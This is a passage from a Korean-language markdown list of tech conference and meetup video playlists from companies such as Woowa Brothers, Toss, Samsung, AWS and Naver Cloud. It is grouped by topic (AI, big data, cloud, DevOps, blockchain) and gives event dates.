[2020](https://www.youtube.com/playlist?list=PLI2S-k0Fa59vrCkUC9G8kiu7w4PRXJI_5) | [2021](https://www.youtube.com/playlist?list=PLI2S-k0Fa59uUuHm1z3kxCFw8rC8t6G13) | [Tech-Verse 2022](https://www.youtube.com/playlist?list=PLMfHuI-eghZngpW8gzd6RAMlMwmwiN0Bg) - 2022.11.17~18 - [๊ฐœ๋ฐœ์ž ๋ฐ‹์—…](https://www.youtube.com/playlist?list=PLCLlfefjD20Dxye1oiE8NBaFG9pMEg1dC) - 2023.02.23 - ์ฟ ํŒก - [Reveal](https://event.coupangcorp.com) - [2020](https://www.youtube.com/playlist?list=PLPEWOJIs9P6gZJU6aXPilU-kXHVXOPiNz) | [2021](https://www.youtube.com/playlist?list=PLPEWOJIs9P6jjpZqjLMt4GrwxjZ4xRaNp) - 2021.12.09 - ๋ฐฐ๋‹ฌ์˜ ๋ฏผ์กฑ - [์šฐ์•„์ฝ˜](https://woowacon.com) - [2020](https://www.youtube.com/playlist?list=PLgXGHBqgT2TuFNlBkBRqf57__Z5IKfo8U) | [2021](https://www.youtube.com/playlist?list=PLgXGHBqgT2Ttcttvjy5_4GacLPcs6iM-s) | [2022](https://youtu.be/dReFpG8aVwU?list=PLgXGHBqgT2TsFnKRe3_kvFXDFUWxaUvQ2) | [2023](https://www.youtube.com/playlist?list=PLgXGHBqgT2TundZ81MAVHPzeYOTeII69j) - 2023.11.15 - โœจ [์šฐ์•„ํ•œํ…Œํฌ์„ธ๋ฏธ๋‚˜: ๋งค ์›” ๋งŒ๋‚˜๋Š” ๊ธฐ์ˆ  ์ด์•ผ๊ธฐ](https://www.youtube.com/playlist?list=PLgXGHBqgT2TtGi82mCZWuhMu-nQy301ew) - 2024.06.03 - [์ด๊ฒŒ ๋ฌด์Šจ ์ผ์ด์•ผ! 
์ปจํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLu6f31_SRNTiOEKsCAZxdBeWL2UyKk_Lg) - 2022.04.01 - [์šฐ์•„ํ•œ PM์˜ ๋ฐค๐ŸŒ™](https://www.youtube.com/playlist?list=PLu6f31_SRNTjfCd5y7aLypDTI_IKDxL-t) - 2022.07.07 - ํ† ์Šค - [SLASH](https://toss.im/slash-23) - [21, 22, 23](https://www.youtube.com/playlist?list=PL1DJtS1Hv1PiGXmgruP1_gM2TSvQiOsFL) - 2023.06.08~09 - Simplicity(ํ† ์Šค ๋””์ž์ธ ์ปจํผ๋Ÿฐ์Šค) - [21](https://www.youtube.com/playlist?list=PL1DJtS1Hv1PgAekdTPF0lKtfsqAis3HXR) - 2021.08.30~09.02 - ์‚ผ์„ฑ - SDC Korea - [2022](https://www.youtube.com/playlist?list=PL7PfK8Mp1rLEoOveKoz9vs6BA8eXuy_O8) | [2023](https://www.youtube.com/playlist?list=PL7PfK8Mp1rLEfUuYXsZMnBqtFcAIqbAk7) - 2023.11.14~15 - ์‚ผ์„ฑSDS - Gen AI Day - 2024 [์œ ํ†ต/๋ฆฌํ…Œ์ผ](https://www.youtube.com/playlist?list=PL5CBKg4LPW2cml2-MqeWDwEcu9zAsGLsz), [๊ณต๊ณต](https://www.youtube.com/playlist?list=PL5CBKg4LPW2dTQHClWbAJzD6NPfi-PDf4) - 2024.04.19 - Techtonic - [2020](https://www.samsungsds.com/kr/event/techtonic2020.html) | [2021](https://www.samsungsds.com/kr/event/techtonic2021.html) - 2021.11.23~24 - REAL SUMMIT - [2020](https://www.youtube.com/playlist?list=PL5CBKg4LPW2fDDfTrui3MJdwy3NgK2ziW) | [2021](https://www.youtube.com/playlist?list=PL5CBKg4LPW2fIhDRr7ljbAv208eyHVGSN) | [2022](https://www.samsungsds.com/kr/real/real-summit-2022.html) | [2023](https://www.youtube.com/playlist?list=PL5CBKg4LPW2cIzr4JDfR7LFl3GJcQrb5p) - 2023.09.12 - SK - [SK ICT Tech Summit](https://www.sktechsummit.com) - [2022](https://www.youtube.com/@sktechsummit/playlists) | [2023](https://www.sktechsummit.com/sessions/sessionsList.do) - 2023.11.16~17 - [๋ฐ๋ณด์…˜(DEVOCEAN)](https://devocean.sk.com) - [ํ…Œํฌ ์„ธ๋ฏธ๋‚˜](https://www.youtube.com/playlist?list=PLxMQvxfkXLNmbZAB6THj_RQyCrc6Ok5eS) - 2023.12.21 - ๋ฐ๋ณด์…˜(DEVOCEAN) - ํ…Œํฌ ๋ฐ์ด [์ œ1ํšŒ](https://www.youtube.com/playlist?list=PLxMQvxfkXLNm1W2_JZFIxCeuxhDev7j7C) | [์ œ2ํšŒ](https://www.youtube.com/playlist?list=PLxMQvxfkXLNkhtvGiIsUlmPYwUJAp97IA) | [์ œ3ํšŒ](https://www.youtube.com/playlist?list=PLxMQvxfkXLNlZTU9yUzwXy6XItgql69M_) | [์ œ4ํšŒ](https://www.youtube.com/playlist?list=PLxMQvxfkXLNkem4QIPXR24Uwdd3IyOHtJ) | [์ œ5ํšŒ](https://www.youtube.com/playlist?list=PLxMQvxfkXLNm5BAsvXC1SItjHApQh3gPe) - 2023.10.20 - LG CNS - [๋‰ด ๋…ธ๋ฉ€์‹œ๋Œ€์— ํ•„์š”ํ•œ Application Modernization](https://www.youtube.com/playlist?list=PLxcN3kbNdAoAYrRZjyfqp9Mv5Au2mJduT) | [CloudXper ProOps Launching Webinar](https://www.youtube.com/playlist?list=PLxcN3kbNdAoA8N1kDA9ur88spcxOAf-dg) | [Security Summit 2021](https://www.youtube.com/playlist?list=PLxcN3kbNdAoBZhTTb_X_-xZfNGsss2hle) | [Entrue SMART DX 2021](https://www.youtube.com/playlist?list=PLxcN3kbNdAoDeRx9vqmpJRPJsASECi8qw) - 2021.09.14 - [AI Day 2020](https://www.youtube.com/playlist?list=PLxcN3kbNdAoBte9-xyUhS43tWPbiBubah) - 2020.10.15 ## ์ธ๊ณต์ง€๋Šฅ - ๋„ค์ด๋ฒ„ - CLOVA [AI NOW](https://naver-ai-now.kr) - [2021](https://tv.naver.com/v/20386632/list/710578) - 2021.05.25 - LG [AI Research](https://www.lgresearch.ai) - LG AI Talk Concert - [2021](https://www.youtube.com/playlist?list=PL8gIGFY2fYQSMXOINKgJBp0v_UP92-4UZ) | [2022](https://youtu.be/pmvJK6ZNkHY?list=PL8gIGFY2fYQSMXOINKgJBp0v_UP92-4UZ&t=586) | [2023](https://youtu.be/tbeGE19qIk4?list=PL8gIGFY2fYQSMXOINKgJBp0v_UP92-4UZ) - 2023.07.19 - ๋ชจ๋‘์˜ ์—ฐ๊ตฌ์†Œ - [๋ชจ๋‘์ฝ˜](https://moducon.kr) - [2021](https://www.youtube.com/playlist?list=PLv6H9ngYdJbLS2OdGLlL0IslWlhJHgg_L) | [2022](https://www.youtube.com/playlist?list=PLv6H9ngYdJbLJFzeqS0i4ZeYeRHDaXUak) | 
[2023](https://www.youtube.com/playlist?list=PLv6H9ngYdJbJbdzsU7QfXdFMHuXa95Fvj) - 2023.12.09 - โœจ [๋ชจ๋‘ํŒ | Pop Pop ํ„ฐ์ง€๋Š” AI ์„ธ๋ฏธ๋‚˜](https://www.youtube.com/playlist?list=PLv6H9ngYdJbKcGl2VrVBr8YAClPcVrrim) - 2024.05.28 - ์ฝ”์นญ์Šคํ„ฐ๋”” ์„ธ๋ฏธ๋‚˜ - [ํŒŒ์ด์ฌ์œผ๋กœ ์ปค๋ฆฌ์–ด](https://youtu.be/mxuWqUzbD6c?list=PLv6H9ngYdJbIvGCrGWYFfpS0vhkgZjzXj&t=1750), [๋ฐ์ดํ„ฐ๋กœ](https://youtu.be/jwnUenNGF04) ์Šคํ‚ฌ UP! - 2022.11.15 - ๊ฐ€์งœ์—ฐ๊ตฌ์†Œ - [Pseudo Lab](https://www.facebook.com/groups/pseudolab) - [PseudoCon 2020](https://www.youtube.com/playlist?list=PLyP9gclj-bv6Mn0XFJa1fiNppjGVaILp4) | [์ œ 2ํšŒ](https://www.youtube.com/playlist?list=PLyP9gclj-bv5ctl36Z-ysQO2U3TRzODDG) - 2021.05.21 - ์—…์Šคํ…Œ์ด์ง€ - [๐Ÿ–ฅ Tech Talks](https://www.youtube.com/playlist?list=PLkeKJYdfv8RLyrQ5WriBcKxMwjmc0c01T) - 2022.03.04 - [๐Ÿ’กInsight Talks](https://www.youtube.com/playlist?list=PLkeKJYdfv8RKPlYhfvsZe2_ugniN2JogS) - 2022.05.26 - ๋ž˜๋ธ”์—… - Lablup conf [1st](https://www.youtube.com/playlist?list=PLYkiFpaI5DIJEfSxXJRhiF_bQF6u9KFLb) | [2nd](https://www.youtube.com/playlist?list=PLYkiFpaI5DILsreVr61Jw2Jgjf3BoCZGV) | [3rd](https://www.youtube.com/playlist?list=PLYkiFpaI5DIKZF61XDM2ENBDyPvwVhNnB) - 2023.10.21 - ์†”ํŠธ๋ฃฉ์Šค - ์†”ํŠธ๋ฃฉ์Šค ์ธ๊ณต์ง€๋Šฅ ์ปจํผ๋Ÿฐ์Šค(SAC) - [2020](https://youtu.be/f_w3s18CGLg?list=PLQKhpTP94IsenU1Z_PSU-4HRWJ--NO_9l) | [2021](https://youtu.be/1nEc4UVaZOU?list=PLQKhpTP94IsenU1Z_PSU-4HRWJ--NO_9l) | [2022](https://youtu.be/D5fOutPofgk) | [2023](https://youtu.be/V_7xw0Nr5CE?list=PLQKhpTP94IscWoPTzE6DaZmCGVpup6acb) - 2023.09.07 - ์ „์ž์‹ ๋ฌธ ์›จ๋น„๋‚˜ ์ „๋ฌธ๋ฐฉ์†ก [allshow TV](https://www.allshowtv.com) - AIยทDATA Summit Korea - [2022](https://www.youtube.com/playlist?list=PLumdCu9Q56KqdRLic5zBLPZ3ahrUdN05W) | [2023](https://www.youtube.com/playlist?list=PLumdCu9Q56Kps9gFH2inwXqM2F1AASWhE) - 2023.02.24 - AIยทDX Summit Korea - [2022](https://www.youtube.com/playlist?list=PLumdCu9Q56Kpjjo1SW29u0XnT7JiMNMU0) | [2023](https://www.youtube.com/playlist?list=PLumdCu9Q56KqVnoGXp13ItTijqQq8-uCr) - 2023.05.26 - AI ์ฐจ์„ธ๋Œ€ ์ปจํƒ์„ผํ„ฐ ์ปจํผ๋Ÿฐ์Šค 2021 [์ œ4ํšŒ](https://www.youtube.com/playlist?list=PLumdCu9Q56KqLcP6rG01k0CyR9gnbE3kY) | [์ œ5ํšŒ](https://www.youtube.com/playlist?list=PLumdCu9Q56KpsceRGouaf0hEUNmx2taQ8) | 2022 [์ œ6ํšŒ](https://www.youtube.com/playlist?list=PLumdCu9Q56KrgyTJ8rK4JpxSlBy9cMp2Y) | [2023](https://www.youtube.com/playlist?list=PLumdCu9Q56Kp6LCKlJ8S2hCgxwHd-_sOM), [์ œ9ํšŒ](https://www.youtube.com/playlist?list=PLumdCu9Q56KrqL3THdXlkNjBGN6bmsqts) - 2023.09.06 - [2021 AI & Big Data Smart Convergence](https://www.youtube.com/playlist?list=PLumdCu9Q56Kp_SM7qG6ILsleZJTe-zXVy) - 2021.09.09 - ๋Œ€๋•ํŠน๊ตฌ SPACE-S - ๋Œ€์ „๋Ÿฌ๋‹๋ฐ์ด - [DLD 2022](https://www.youtube.com/playlist?list=PLudxIRsX4I3Sj6R-4INhtyNXqC0U5mFuU) - 2022.10.25 - [INNOPOLIS AI ์„ธ๋ฏธ๋‚˜](https://www.youtube.com/channel/UCJwSFW3lKme5XUZF-cjSPoQ/featured) - 2023.07.26 - Deeplearning Playground ์ปค๋ฎค๋‹ˆํ‹ฐ - [์•ˆ๋…•ํ•˜์„ธ์š” Korea, from W&B](https://youtu.be/sW3VxlJl46o) - 2022.03.26 - ๊ธฐํƒ€ - [2022 Connect to Code(C2C) - ์‚ฐ์—… ํ™˜๊ฒฝ์˜ ๋””์ง€ํ„ธ ์ „ํ™˜์„ ์œ„ํ•œ AI & ๋จธ์‹ ๋Ÿฌ๋‹](https://youtu.be/As3D_NINZ44?t=1769) - 2022.11.15 ## ๋น…๋ฐ์ดํ„ฐ - ํ•œ๊ตญ๋ฐ์ดํ„ฐ์‚ฐ์—…์ง„ํฅ์› - [๋ฐ์ดํ„ฐ ๊ทธ๋žœ๋“œ ์ปจํผ๋Ÿฐ์Šค](https://dataconference.or.kr) - [2020](https://www.youtube.com/playlist?list=PLimZR7g-UQN_UZCckMVWe52Ei8SKimY2o) | [2021](https://www.youtube.com/playlist?list=PLimZR7g-UQN8W9IUPqPl-e0yx-Z6nLzWH) | 
[2022](https://www.youtube.com/playlist?list=PLimZR7g-UQN_LUB4hqb1UB-RNiNWawE_W) | [2023](https://www.youtube.com/playlist?list=PLimZR7g-UQN8wghJypx86DncmYzPg1Akd) - 2023.12.14 - ๋ฐ์ดํ„ฐ์•ผ๋†€์ž - ๋ฐ์ดํ„ฐ์•ผ๋†€์ž - [2020](https://www.youtube.com/playlist?list=PL7yPwpDiPFlIO4tiVwCZ391JJ2KwhZzDU) | [2021](https://www.youtube.com/playlist?list=PL7yPwpDiPFlIoiBPrX3fQk6XT-UrE-wRt) | [2022](https://www.youtube.com/playlist?list=PL7yPwpDiPFlJrLWUDjhzoHsrZo_7qwYZT) | [2023](https://www.youtube.com/playlist?list=PL7yPwpDiPFlIIWxRwsDJ5oc1yjNFqSFzB) - 2023.10.14 - ๋น…๋ฐ์ดํ„ฐ ์—ฐํ•ฉ๋™์•„๋ฆฌ [๋ณด์•„์ฆˆ(BOAZ)](https://www.facebook.com/BOAZbigdata) - [์ œ 11ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6DodqJiUNa8LgjT1B6vt4NC) | [์ œ 12ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6CqH3cDSJQjMVBKQRuORwTW) | [์ œ 13ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6Bd_5lMozoy8e10XZb7DaKl) | [์ œ 14ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6Aa1t7GBv7xotMv1btzq-2U) | [์ œ 15ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6A1K4qS4lf9hYd-hg0svRmU) | [์ œ 16ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6AEacVgZVcpMxUlWHlXGFor) | [์ œ 17ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6Db4-HPgTWW5JJnTrNvmoQS) | [์ œ 18ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6Abvmao-_XKqXMSUUocwSY6) | [์ œ 19ํšŒ](https://www.youtube.com/@bigdataboaz4452/videos) - 2024.01.27 - MLOps Korea - [2021 MLOps KR 1st community](https://www.youtube.com/playlist?list=PLIuC6QlQQF0Pf-aM0tioYTjrnLzaJaGez) - 2021.06.05 ## ํด๋ผ์šฐ๋“œ - ๋„ค์ด๋ฒ„ ํด๋ผ์šฐ๋“œ ํ”Œ๋žซํผ(NCP) - NAVER Cloud SUMMIT - [2021](https://www.youtube.com/playlist?list=PLpywxIpxgxhFb9wCdCuiiU6WcWzGFR6c5) | [2022](https://www.youtube.com/playlist?list=PLpywxIpxgxhGY6IJW17IW8-eEHmvWa5FK) - 2022.12.14 - ์ปจํผ๋Ÿฐ์Šค - [๊ฒŒ์ž„ 2021](https://www.youtube.com/playlist?list=PLpywxIpxgxhHK1dGhSMCeebkNshm_Pvkz) | [์ œ์กฐ 2021](https://www.youtube.com/playlist?list=PLpywxIpxgxhHkyuYUHEU2gTVbw1_hjxgd) | [๊ธˆ์œต 2023](https://www.youtube.com/playlist?list=PLpywxIpxgxhFe71pLAwddPMOeMI4zgnGj) - 2023.10.25 - [ํ…Œํฌ๋ฐ‹์—…](https://www.youtube.com/playlist?list=PLpywxIpxgxhGpqHTbyiUAV5ZX_xDYkRWK) - 2022.04.20 - [์˜จ๋ผ์ธ ๊ต์œก](https://www.youtube.com/playlist?list=PLpywxIpxgxhHmVzdtULIaYwzFKjc41TVr) - 2023.03.15 - NHN - NHN [FORWARD](https://forward.nhn.com) - [2020](https://www.youtube.com/playlist?list=PL42XJKPNDepZbqM9N11RxL5UY_5PbA_Wo) | [2021](https://www.youtube.com/playlist?list=PL42XJKPNDepZC5HXlqxzTTJ_Ai_KDcXRa) | [2022](https://www.youtube.com/playlist?list=PL42XJKPNDepYXyKefvicxlA2fz1aThVs5) - 2022.11.24 - NHN [Cloud make IT](https://makeit.nhncloud.com) - [2022](https://www.youtube.com/playlist?list=PL42XJKPNDepZLj8ZtktFJ6MsF4IdhcQB0) | [2023](https://www.youtube.com/playlist?list=PL42XJKPNDepbuujKpiCqYk3oF3VeBZjI8) - 2023.06.22 - NHN [Cloud On](https://www.youtube.com/playlist?list=PL42XJKPNDepbXNAIIhWrgiD7gSFCuqyRa) - 2023.10.31 - kt cloud - kt cloud : summit - [2023](https://www.youtube.com/playlist?list=PLaRqSfWeygEfdb6csw41l5R2pDd4RZgOm) | [2024](https://www.youtube.com/playlist?list=PLaRqSfWeygEeR4jeZjzmeiKsQ7pLU8q3G) - 2024.05.02 - [Monthly Webinar](https://www.youtube.com/playlist?list=PLaRqSfWeygEd1iiAaOsfn39VlrTkNMoi1) - 2024.04.25 - ๋ฉ”๊ฐ€์กด - [๋””์ง€ํ„ธ ๋‹ค์นดํฌ](https://www.megazone.com/application_form_digitaldacapo2022-apply-220208) - [2022](https://www.youtube.com/playlist?list=PLxTkO33QtxTICeek2PbVPW_zbwZXV0hCe) | 
[2023](https://www.youtube.com/playlist?list=PLxTkO33QtxTJPzx9GtsJvVdfARm7Af_k7) - 2023.01.10 - AWS [๋ฆฌ์†Œ์Šค ํ—ˆ๋ธŒ](https://kr-resources.awscloud.com) - AWS re:Invent [2021 ํ•œ๊ตญ์–ด ํŠธ๋ž™](https://www.youtube.com/playlist?list=PLORxAVAC5fUW40w3WpbSbACrHZqhoQmG6) | [2023 ํ•œ๊ตญ์–ด ๊ฐ•์—ฐ](https://www.youtube.com/playlist?list=PLORxAVAC5fUW40w3WpbSbACrHZqhoQmG6) | re:Cap [2020](https://www.youtube.com/playlist?list=PLORxAVAC5fUXzLlNAXGA1HUG2HFgR5T_Q) | [2021](https://www.youtube.com/playlist?list=PLORxAVAC5fUX9IHNx3Zhzfq-cSF-F2H8I) | [2022 Daily Recap](https://www.youtube.com/playlist?list=PLORxAVAC5fUUmumUj0Q4JaraT6WNMbfuO) - 2023.11.27~12.01 - AWS Summit Online Korea [2020](https://www.youtube.com/playlist?list=PLORxAVAC5fUWAd4oEEXU-PSb4LELpPA82) | [2021](https://www.youtube.com/playlist?list=PLORxAVAC5fUW7yw8e0olxjf11Qv010Jz-) | [2022](https://www.youtube.com/playlist?list=PLORxAVAC5fUX7j65Uvp9xAi1hMS6M-2P1) | [2023](https://www.youtube.com/playlist?list=PLORxAVAC5fUVLujXBa2aXPjaMLAM4XNr3) - 2023.05.03~04 - AWS Summit Seoul [2023](https://www.youtube.com/playlist?list=PLORxAVAC5fUVLujXBa2aXPjaMLAM4XNr3) - 2023.05.03~04 - AWS Innovate 2021 - [AI/ML](https://www.youtube.com/playlist?list=PLORxAVAC5fUWUC-lXkou_8oobUArafWE_), [Data](https://www.youtube.com/playlist?list=PLORxAVAC5fUW3stiOQeXwidbOvbm8xYbB), [์•ฑํ˜„๋Œ€ํ™”](https://www.youtube.com/playlist?list=PLORxAVAC5fUUFPs8yy-fvYwI6zYSD-by2) | 2022 - [AI/ML](https://www.youtube.com/playlist?list=PLORxAVAC5fUVqyzPFUXdNnD8k1KYRDbwI), [Data](https://www.youtube.com/playlist?list=PLORxAVAC5fUVlqCYPgAzccuKUcmLinrnh), [์•ฑํ˜„๋Œ€ํ™”](https://www.youtube.com/playlist?list=PLORxAVAC5fUXJUUqptRtyDasuklx3SCmX), [For Every App](https://www.youtube.com/playlist?list=PLORxAVAC5fUXIsBWZ4F7Vhx7RnAwszKdb) | 2023 - [AI/ML](https://www.youtube.com/playlist?list=PLORxAVAC5fUWkmf6r2ZfGSC1m4rhyfJMO) - 2023.02.22 - AWS Builders ์˜จ๋ผ์ธ ์‹œ๋ฆฌ์ฆˆ [2021](https://www.youtube.com/playlist?list=PLORxAVAC5fUWPziIFAho12lvGl1hR7ZZ5) | [2022](https://www.youtube.com/playlist?list=PLORxAVAC5fUX_OlbTijMFcH3iYfdCJrqc) | [2023](https://www.youtube.com/playlist?list=PLORxAVAC5fUU7cywJX6ilucVIhxwwfxei) - 2023.01.18 - AWS Startup Week [2023](https://www.youtube.com/playlist?list=PLORxAVAC5fUViBsvUeiG8vEPGWHmTnehN) | [Unicorn Day 2024](https://www.youtube.com/playlist?list=PLORxAVAC5fUV6iiTsRWrk0NOIpEn8k5gE) - 2024.03.20 - Games on AWS [2022](https://www.youtube.com/playlist?list=PLORxAVAC5fUXJK1tgrWEmwgWIZWSqNoGj) | [2023](https://www.youtube.com/playlist?list=PLORxAVAC5fUXTApC8pivE7UXpx-QmESLq) - 2023.10.24 - ์˜ค๋ผํด [ํด๋ผ์šฐ๋“œ ์‚ฌ์šฉ์ž ๊ทธ๋ฃน](https://www.facebook.com/groups/koreaoraclecloud) - [Oracle Database World - Korea](https://youtu.be/zynSuLI1Aa8?list=PL_lN0QYuCPSF5XyXrvWthJdjRtu37XTTu) - 2022.07.21 - [๋””๋ฒจ๋กœํผ (DEV)](https://www.youtube.com/playlist?list=PL_lN0QYuCPSGzA9TmINzKP61R0p40DX29) - 2024.04.24 - [Oracle Cloud Summit 2024](https://youtu.be/4nnjKMdcnyo?list=PL_lN0QYuCPSGOIK7v2r6TQ_DYdwa8j1Sp) - 2024.01.25 - Google [Cloud Summit](https://cloudonair.withgoogle.com/events/summit-korea-livestream) - [Google Cloud Summit Seoul '19](https://www.youtube.com/playlist?list=PLBgogxgQVM9tS7Yhzjc3Wt56jc5j-z_4C) - 2019.11.06 - ํ•œ๊ตญ๋งˆ์ดํฌ๋กœ์†Œํ”„ํŠธ - [Microsoft Startup Summit 2023](https://www.youtube.com/playlist?list=PLGh_JNxzXsX9NSm-iyAdS4Ioco0vp4jtq) - 2023.10.26 - Azure [Everywhere 2021](https://www.youtube.com/playlist?list=PLGh_JNxzXsX_YkjiqSwDRbEnVOk_vNV0D) | 2022 - 
[Azure](https://www.youtube.com/playlist?list=PLGh_JNxzXsX-Wu_DN4C6A8EzsI9DLiZHK), [Dev](https://www.youtube.com/playlist?list=PLGh_JNxzXsX9va2yAFrGNBYKAfHNg463b), [Security](https://www.youtube.com/playlist?list=PLGh_JNxzXsX_eHsDpyRV5rJbWb8nrHezV), [Modern Work](https://www.youtube.com/playlist?list=PLGh_JNxzXsX9RxStNUDma-7-cnq4q9oFm) - 2022.04.06~27 - [ํ•œ๊ตญ Azure ์‚ฌ์šฉ์ž ๊ทธ๋ฃน](https://www.facebook.com/groups/krazure) - [GAV2020KR](https://www.youtube.com/playlist?list=PLFbmOoKZ852WRZkFql8Gv1U-CNX_WRHen) | [Global Azure 2021 Korea](https://www.youtube.com/playlist?list=PLFbmOoKZ852XZ41ODzJqlzB-8sq7VQt0j) - 2021.04.24 - [Kubernetes Korea Group](https://www.facebook.com/groups/k8skr) - Kubernetes Community Day [KCD Korea 2021](https://www.youtube.com/playlist?list=PL1j_IgwZkt4Mgj7OKf1SHjgAp2UQtey_I) | [2023](https://www.youtube.com/playlist?list=PL1j_IgwZkt4PIWBHTlGr9UDmJTpGjU59C) - 2023.07.03 - Cloud Native Community Groups [CNCG Seoul 2020](https://www.youtube.com/playlist?list=PL1j_IgwZkt4Pug8dpF7yWT5ba-qGybUgN) - 2020.10.29 - ๊ธฐํƒ€ - ์‰์–ด๋“œIT - [ํด๋ผ์šฐ๋“œ ์ธํ”„๋ผ ์ปจํผ๋Ÿฐ์Šค](https://youtu.be/NW6oywF_pGM?list=PLyPtqY7T1lotU8fInOfnSuRYxNgLcoahO) - 2022.07.26 - ๊ณผํ•™๊ธฐ์ˆ ์ •๋ณดํ†ต์‹ ๋ถ€ - Open Cloud Platform Summit - [2022](https://www.youtube.com/playlist?list=PL-AoIAa-OgNnym3kkTmIlko53smWH4L0p) | [2023](https://www.youtube.com/playlist?list=PL-AoIAa-OgNla-rPexcg9WpEntQ9fPKDD) - 2023.07.12 - ์Šค๋งˆํŠธํด๋ผ์šฐ๋“œ์‡ผ2021 - [1์ผ์ฐจ](https://youtu.be/Y335QzGRz1U) | [2์ผ์ฐจ](https://youtu.be/Itk2Wy3oiKE) - 2021.09.28~29 - ์ง€ํ‹ฐํ”Œ๋Ÿฌ์Šค - Get Tech Day [2021](https://www.youtube.com/playlist?list=PLM48rFX5FOnbMQyAZZIGItYhax_B9REC8) | [2022](https://www.youtube.com/playlist?list=PLM48rFX5FOnYZVXnxF49sBtCJCLkDCDo3) - 2022.12.15 ## ์ธํ”„๋ผ & ๋ฐ๋ธŒ์˜ต์Šค - ์˜คํ”ˆ ์ธํ”„๋ผ ์ปค๋ฎค๋‹ˆํ‹ฐ - OpenInfra Community Days Korea - [2020](https://www.youtube.com/playlist?list=PLkgLtPJ7Lg3rLLET-H1fS12OF0bBtOE-p) | [2021](https://www.youtube.com/playlist?list=PLkgLtPJ7Lg3o6FZNJiB10vReh_iXve6LS) | [2023](https://www.youtube.com/playlist?list=PLkgLtPJ7Lg3pIbzuNxOix9Co5pHgAU98a) - 2023.07.03~04 - [OpenInfra & Cloud Native Days Korea 2022](https://www.youtube.com/playlist?list=PLkgLtPJ7Lg3rnn_p6QV-GVdgqL-ZgZnZo) - 2022.11.01 - KAFKA ํ•œ๊ตญ ์‚ฌ์šฉ์ž ๋ชจ์ž„ [KRU](https://www.facebook.com/groups/kafka.kru) - Virtual Meetup [2020](https://www.youtube.com/playlist?list=PLUc8G1CJwNG2nJgOqRESbI64C0cWU9-nx) | [2021](https://www.youtube.com/playlist?list=PLUc8G1CJwNG3E3_q6nY2_xM9jjHx0t7bw) | [2022](https://www.youtube.com/playlist?list=PLUc8G1CJwNG3ipaXxW25_a_bTVn3yM69g) - 2022.04.14 - Datadog Korea - [Virtual Summit 2020](https://www.youtube.com/playlist?list=PLtoDdE_CaqrQVY5iuha4xGMK6smnLfgi4) | [DASH 2023](https://www.youtube.com/playlist?list=PLtoDdE_CaqrT9r7VwpELbzl6acIuxzc3w) | [Observability Day 2023](https://www.youtube.com/playlist?list=PLtoDdE_CaqrS55NBKZ4ds0jbF0foKone9) - 2023.10.13 - [Datadog ์›จ๋น„๋‚˜ ์‹œ๋ฆฌ์ฆˆ](https://www.youtube.com/playlist?list=PLtoDdE_CaqrR9hMYN40ms_4_k_rNz0ro2) - 2024.02.02 - ๋‹น๊ทผ๋งˆ์ผ“ - ๋‹น๊ทผ SRE ๋ฐ‹์—… - [1ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBqWWla-pCBSRqU-jSriiZHj) | [2ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBqJRSlnE7Xw_QpVkf8u6ISH) | [3ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBopbyEOW1XjP3runE93n9GC) - 2023.06.15 - ๋‹น๊ทผ SERVER ๋ฐ‹์—… - [1ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBr5s_jn5CzZrpkmHOY0N8w7) | [2ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBp2ukW-b4yzcNzNLZ5j7nmh) - 
2023.10.28 - ๋‹น๊ทผ ML ๋ฐ‹์—… - [1ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBqSQM48ospyb9hQTzzvMF4y) - 2024.05.10 - ํ•˜์ดํผ์ปค๋„ฅํŠธ - [HyperLink DevOps & SRE Meetup](https://www.youtube.com/playlist?list=PL1DMLLaNeMxa8Rq0aGcrJ-j3nTSWP7vfE) - 2022.03.02 - HashCorp - HashiCorp Strategy Day [2023](https://www.youtube.com/playlist?list=PL81sUbsFNc5ZkHno0jkNtQJgWdlY_xpG7) - 2023.04.11 - HashiTalks [Korea 2022, 2023](https://www.youtube.com/playlist?list=PL81sUbsFNc5aQFJNIh74lRJtav5TfjANB) - 2023.09.07 ## ๋ธ”๋ก์ฒด์ธ - ์—…๋น„ํŠธ - [UDC](https://udc.upbit.com/) - [2020](https://www.youtube.com/playlist?list=PLyONEtYCZLWXsfYZJlp4r5doQflsIEYcZ) | [2021](https://www.youtube.com/playlist?list=PLyONEtYCZLWU7nxtYgVxNJVgtTnFFeQ77) | [2022](https://www.youtube.com/playlist?list=PLyONEtYCZLWXqxJ3IbXz3PJ8Uc3ZHkmP6) | [2023](https://www.youtube.com/playlist?list=PLyONEtYCZLWWAct203e-Dm1_fC3Ebgu65) - 2023.11.13 - [DCON 2023](https://www.youtube.com/playlist?list=PLjziuUtwQOz1n1GLizGeUOquf5rNdZAlx) - 2023.03.16 - ๋žŒ๋‹ค256 - Luniverse - [2021](https://www.youtube.com/playlist?list=PLXDdGRMRFqmGRS82o4fGBpXFlHANdPRmn) | [2022](https://www.youtube.com/playlist?list=PLXDdGRMRFqmGaJV8N--ofWmE_tiW7creV) - 2022.04.12 - ํ•œ๊ตญ์ธํ„ฐ๋„ท์ง„ํฅ์› - ๋ธ”๋ก์ฒด์ธ ๋ฐ‹์—… ์ปจํผ๋Ÿฐ์Šค - [2022](https://www.youtube.com/playlist?list=PLiagZi75rsoZBPHOtg-ASJOkx3meCG_c-) | [2023](https://www.youtube.com/playlist?list=PLiagZi75rsoZ4keCGjZdvafP_WmZChvOr) - 2023.04.05 - ๊ธฐํƒ€ - ํ…ŒํฌM - [ํ…ŒํฌB ์ฝ˜ํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLpCs8R7ZoTIDp8zRwOzk3gKRQIueOSeDc) - 2022.08.18 - ๊นŒํŽ˜24 - [NFT ํ™œ์šฉ ์ด์ปค๋จธ์Šค ์„ฑ๊ณต์ „๋žต 